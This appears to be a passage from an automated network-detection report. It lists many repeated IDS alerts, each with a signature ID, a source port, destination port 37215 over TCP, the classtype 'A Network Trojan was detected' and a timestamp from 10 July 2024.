                  SID:2835222
                  Source Port:39704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915007
                  SID:2829579
                  Source Port:53600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030888
                  SID:2829579
                  Source Port:54528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875220
                  SID:2835222
                  Source Port:35318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454696
                  SID:2829579
                  Source Port:36736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2829579
                  Source Port:56828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.016344
                  SID:2835222
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.341991
                  SID:2829579
                  Source Port:46376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.923569
                  SID:2829579
                  Source Port:60344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.785071
                  SID:2829579
                  Source Port:36786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517379
                  SID:2835222
                  Source Port:34576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2829579
                  Source Port:43574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2829579
                  Source Port:38940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.499571
                  SID:2835222
                  Source Port:46804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808905
                  SID:2829579
                  Source Port:59750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516859
                  SID:2835222
                  Source Port:50264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2835222
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.889054
                  SID:2829579
                  Source Port:58136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.444062
                  SID:2835222
                  Source Port:40708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2835222
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2829579
                  Source Port:47952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:40300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.449225
                  SID:2829579
                  Source Port:58082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2835222
                  Source Port:52538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.366132
                  SID:2835222
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967475
                  SID:2835222
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.177272
                  SID:2835222
                  Source Port:48536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.231914
                  SID:2835222
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2835222
                  Source Port:53190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2829579
                  Source Port:36094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2829579
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.825346
                  SID:2829579
                  Source Port:53718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.108007
                  SID:2829579
                  Source Port:47976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2829579
                  Source Port:48486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2835222
                  Source Port:39462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2829579
                  Source Port:49020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2829579
                  Source Port:41074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.307932
                  SID:2829579
                  Source Port:43754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.628977
                  SID:2835222
                  Source Port:36360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2835222
                  Source Port:42200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:42682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937800
                  SID:2829579
                  Source Port:59394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243364
                  SID:2835222
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2835222
                  Source Port:47128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.939147
                  SID:2829579
                  Source Port:51356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547644
                  SID:2835222
                  Source Port:44996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2835222
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.359553
                  SID:2829579
                  Source Port:36604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.706462
                  SID:2829579
                  Source Port:43646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753086
                  SID:2835222
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832031
                  SID:2829579
                  Source Port:60534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.018737
                  SID:2829579
                  Source Port:50574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2829579
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.980832
                  SID:2829579
                  Source Port:53480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.958835
                  SID:2829579
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.445114
                  SID:2835222
                  Source Port:44216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2835222
                  Source Port:45052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437180
                  SID:2835222
                  Source Port:37904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444942
                  SID:2829579
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2829579
                  Source Port:51298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2835222
                  Source Port:45034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779855
                  SID:2829579
                  Source Port:35646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.752845
                  SID:2829579
                  Source Port:58340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168344
                  SID:2829579
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2835222
                  Source Port:55634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.645835
                  SID:2835222
                  Source Port:33110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656574
                  SID:2835222
                  Source Port:58644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:53690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2835222
                  Source Port:40036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.604198
                  SID:2829579
                  Source Port:39468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.852239
                  SID:2829579
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.108378
                  SID:2835222
                  Source Port:55060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189535
                  SID:2829579
                  Source Port:41914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.101727
                  SID:2835222
                  Source Port:46274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.311448
                  SID:2829579
                  Source Port:44040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2829579
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566054
                  SID:2829579
                  Source Port:50410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2835222
                  Source Port:60808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2835222
                  Source Port:47334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2829579
                  Source Port:48134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2829579
                  Source Port:47970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
                  SID:2829579
                  Source Port:46728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2829579
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2835222
                  Source Port:48732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323011
                  SID:2835222
                  Source Port:59618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848848
                  SID:2835222
                  Source Port:37854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.525491
                  SID:2829579
                  Source Port:51680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563036
                  SID:2835222
                  Source Port:56144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.865886
                  SID:2835222
                  Source Port:58412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2835222
                  Source Port:44916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.441013
                  SID:2829579
                  Source Port:60746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2835222
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2835222
                  Source Port:55694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583934
                  SID:2829579
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174568
                  SID:2835222
                  Source Port:42610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:41840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.789331
                  SID:2835222
                  Source Port:45452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.394343
                  SID:2835222
                  Source Port:42968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655824
                  SID:2829579
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2829579
                  Source Port:37244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.094211
                  SID:2835222
                  Source Port:34828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2829579
                  Source Port:38174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2829579
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825579
                  SID:2829579
                  Source Port:45458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2829579
                  Source Port:60732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483995
                  SID:2835222
                  Source Port:39114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2835222
                  Source Port:47860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.004457
                  SID:2829579
                  Source Port:45232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2829579
                  Source Port:52338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.587829
                  SID:2829579
                  Source Port:45114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2835222
                  Source Port:46810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.133795
                  SID:2829579
                  Source Port:46830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2829579
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542480
                  SID:2829579
                  Source Port:50724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467971
                  SID:2835222
                  Source Port:55532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519019
                  SID:2835222
                  Source Port:45302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2829579
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.754191
                  SID:2829579
                  Source Port:47166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361333
                  SID:2829579
                  Source Port:55804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.496514
                  SID:2829579
                  Source Port:41456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2829579
                  Source Port:54046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2829579
                  Source Port:58680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.222461
                  SID:2835222
                  Source Port:44302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2829579
                  Source Port:50170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2835222
                  Source Port:58886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007894
                  SID:2835222
                  Source Port:53736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857998
                  SID:2835222
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.483739
                  SID:2829579
                  Source Port:37308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.663247
                  SID:2835222
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429020
                  SID:2835222
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2835222
                  Source Port:43674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392725
                  SID:2829579
                  Source Port:52196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2835222
                  Source Port:46296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2835222
                  Source Port:57106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925907
                  SID:2835222
                  Source Port:58044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459998
                  SID:2835222
                  Source Port:49414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515486
                  SID:2829579
                  Source Port:55466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.786770
                  SID:2835222
                  Source Port:41746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645558
                  SID:2835222
                  Source Port:55372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356942
                  SID:2829579
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993007
                  SID:2835222
                  Source Port:56738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943853
                  SID:2829579
                  Source Port:57006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2829579
                  Source Port:37986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.804383
                  SID:2829579
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2835222
                  Source Port:56982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549258
                  SID:2835222
                  Source Port:50762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270061
                  SID:2829579
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:42414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2835222
                  Source Port:58658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.191107
                  SID:2829579
                  Source Port:51144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087236
                  SID:2835222
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2835222
                  Source Port:33938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.551128
                  SID:2829579
                  Source Port:45646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2835222
                  Source Port:34302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.816598
                  SID:2829579
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.886878
                  SID:2829579
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615628
                  SID:2835222
                  Source Port:51036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
                  SID:2829579
                  Source Port:57314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789652
                  SID:2829579
                  Source Port:35160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.918741
                  SID:2829579
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.658405
                  SID:2835222
                  Source Port:47002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148495
                  SID:2829579
                  Source Port:55360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370410
                  SID:2835222
                  Source Port:46766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647511
                  SID:2829579
                  Source Port:43352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819719
                  SID:2829579
                  Source Port:56680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151316
                  SID:2835222
                  Source Port:48728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.710026
                  SID:2829579
                  Source Port:42870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.122106
                  SID:2835222
                  Source Port:45962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.383706
                  SID:2835222
                  Source Port:39400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2835222
                  Source Port:50820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2835222
                  Source Port:56492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2829579
                  Source Port:53690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939159
                  SID:2829579
                  Source Port:44388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253798
                  SID:2829579
                  Source Port:43660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532639
                  SID:2835222
                  Source Port:45476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.523308
                  SID:2829579
                  Source Port:42446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.989699
                  SID:2835222
                  Source Port:44050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.599918
                  SID:2829579
                  Source Port:54716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.560013
                  SID:2829579
                  Source Port:35732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.039425
                  SID:2829579
                  Source Port:48554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.194125
                  SID:2835222
                  Source Port:57740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2829579
                  Source Port:55464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
